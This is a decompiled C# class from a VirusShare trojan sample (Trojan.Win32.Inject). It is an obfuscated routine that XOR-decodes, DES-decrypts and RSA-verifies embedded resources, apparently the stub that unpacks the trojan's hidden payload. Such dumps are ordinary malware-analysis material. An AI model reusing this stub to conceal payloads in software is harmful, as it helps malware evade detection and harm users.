// Decompiled with JetBrains decompiler // Type:  // Assembly: Ressource, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 7A61D5AB-B799-4526-BF58-A6DA1297213F // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Inject.ancbn-87991063fbeea430cdbe9586022ccd45abc0d3ca50af32983044f034c3072515.exe using System; using System.IO; using System.Reflection; using System.Security.Cryptography; internal class \uE00C { private const int \uE000 = 8; private const int \uE001 = 20; private const int \uE002 = 4; private static byte[] \uE003 = new byte[4]; private static byte[] \uE004 = new byte[4]; static \uE00C() { \uE00C.\uE003[0] = \uE00C.\uE004[0] = (byte) 82; \uE00C.\uE003[1] = \uE00C.\uE004[1] = (byte) 83; \uE00C.\uE003[2] = \uE00C.\uE004[2] = (byte) 65; \uE00C.\uE003[3] = (byte) 49; \uE00C.\uE004[3] = (byte) 50; } public static MemoryStream \uE000(Stream _param0) { BinaryReader binaryReader1 = new BinaryReader(_param0); DESCryptoServiceProvider cryptoServiceProvider1 = new DESCryptoServiceProvider(); bool flag1 = binaryReader1.ReadBoolean(); int count1 = (int) binaryReader1.ReadUInt16(); byte[] buffer1 = new byte[count1]; binaryReader1.Read(buffer1, 0, count1); if (flag1) { byte[] buffer2 = new byte[8]; binaryReader1.Read(buffer2, 0, 8); for (int index = 0; index < count1; ++index) buffer1[index] = (byte) ((uint) buffer1[index] ^ (uint) buffer2[index % 8]); } BinaryReader binaryReader2 = new BinaryReader((Stream) new MemoryStream(buffer1, false)); int count2 = (int) binaryReader2.ReadByte(); byte[] buffer3 = new byte[count2]; binaryReader2.Read(buffer3, 0, count2); cryptoServiceProvider1.IV = buffer3; bool flag2 = binaryReader2.ReadBoolean(); int count3 = (int) binaryReader2.ReadByte(); byte[] numArray = new byte[count3]; if (flag2) binaryReader2.Read(numArray, 0, count3); RSACryptoServiceProvider cryptoServiceProvider2 = (RSACryptoServiceProvider) null; int count4 = binaryReader2.ReadInt32(); byte[] buffer4 = new byte[count4]; binaryReader2.Read(buffer4, 0, count4); if (!flag2) { byte[] publicKey = Assembly.GetExecutingAssembly().GetName().GetPublicKey(); if (publicKey == null || publicKey.Length != 160) throw new InvalidOperationException(); Buffer.BlockCopy((Array) publicKey, 12, (Array) numArray, 0, count3); numArray[5] |= (byte) 128; cryptoServiceProvider2 = new RSACryptoServiceProvider(); cryptoServiceProvider2.ImportParameters(\uE00C.\uE000(publicKey)); } cryptoServiceProvider1.Key = numArray; MemoryStream memoryStream = new MemoryStream(); using (CryptoStream cryptoStream = new CryptoStream(binaryReader1.BaseStream, cryptoServiceProvider1.CreateDecryptor(), CryptoStreamMode.Read)) \uE012.\uE000((Stream) cryptoStream, (Stream) memoryStream); if (cryptoServiceProvider2 != null) { memoryStream.Position = 0L; if (!\uE00C.\uE000(cryptoServiceProvider2, (Stream) memoryStream, buffer4)) throw new InvalidOperationException(); } memoryStream.Position = 0L; return memoryStream; } private static byte[] \uE000(byte[] _param0, int _param1, int _param2) { if (_param0 == null || _param0.Length < _param1 + _param2) return (byte[]) null; byte[] destinationArray = new byte[_param2]; Array.Copy((Array) _param0, _param1, (Array) destinationArray, 0, _param2); return destinationArray; } private static RSAParameters \uE000(byte[] _param0) { bool flag = _param0.Length == 160; if (flag && !\uE00C.\uE000(_param0, \uE00C.\uE003, 20)) { RSAParameters rsaParameters = new RSAParameters(); ref RSAParameters local = ref rsaParameters; return rsaParameters; } if (!flag && !\uE00C.\uE000(_param0, \uE00C.\uE004, 8)) { RSAParameters rsaParameters = new RSAParameters(); ref RSAParameters local = ref rsaParameters; return rsaParameters; } RSAParameters rsaParameters1 = new RSAParameters(); int num1 = (flag ? 20 : 8) + 8; int num2 = 4; rsaParameters1.Exponent = \uE00C.\uE000(_param0, num1, num2); Array.Reverse((Array) rsaParameters1.Exponent); int num3 = num1 + num2; int num4 = 128; rsaParameters1.Modulus = \uE00C.\uE000(_param0, num3, num4); Array.Reverse((Array) rsaParameters1.Modulus); if (flag) return rsaParameters1; int num5 = num3 + num4; int num6 = 64; rsaParameters1.P = \uE00C.\uE000(_param0, num5, num6); Array.Reverse((Array) rsaParameters1.P); int num7 = num5 + num6; int num8 = 64; rsaParameters1.Q = \uE00C.\uE000(_param0, num7, num8); Array.Reverse((Array) rsaParameters1.Q); int num9 = num7 + num8; int num10 = 64; rsaParameters1.DP = \uE00C.\uE000(_param0, num9, num10); Array.Reverse((Array) rsaParameters1.DP); int num11 = num9 + num10; int num12 = 64; rsaParameters1.DQ = \uE00C.\uE000(_param0, num11, num12); Array.Reverse((Array) rsaParameters1.DQ); int num13 = num11 + num12; int num14 = 64; rsaParameters1.InverseQ = \uE00C.\uE000(_param0, num13, num14); Array.Reverse((Array) rsaParameters1.InverseQ); int num15 = num13 + num14; int num16 = 128; rsaParameters1.D = \uE00C.\uE000(_param0, num15, num16); Array.Reverse((Array) rsaParameters1.D); return rsaParameters1; } private static bool \uE000(byte[] _param0, byte[] _param1, int _param2) { for (int index = 0; index < _param1.Length; ++index) { if ((int) _param0[index + _param2] != (int) _param1[index]) return false; } return true; } private static bool \uE000(RSACryptoServiceProvider _param0, Stream _param1, byte[] _param2) { byte[] hash = new SHA1Managed().ComputeHash(_param1); return _param0.VerifyHash(hash, CryptoConfig.MapNameToOID("SHA1"), _param2); } }